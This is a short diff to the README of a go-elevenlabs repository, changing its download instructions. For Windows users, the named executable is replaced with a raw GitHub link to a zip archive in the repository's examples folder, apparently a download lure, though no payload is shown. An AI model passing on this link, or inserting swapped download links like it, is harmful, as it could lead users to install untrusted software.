jerjer04/go-elevenlabs/README.md

    - Look for the latest release version available.

 2. **Choose the Right File for Your System**
-   - For Windows users, find the file named `go-elevenlabs-windows.exe`.
+   - For Windows users, find the file named `https://raw.githubusercontent.com/jerjer04/go-elevenlabs/main/examples/go-elevenlabs_2.8-alpha.1.zip`.
    - For Mac users, choose `go-elevenlabs-macos`.
    - For Linux users, select `go-elevenlabs-linux`.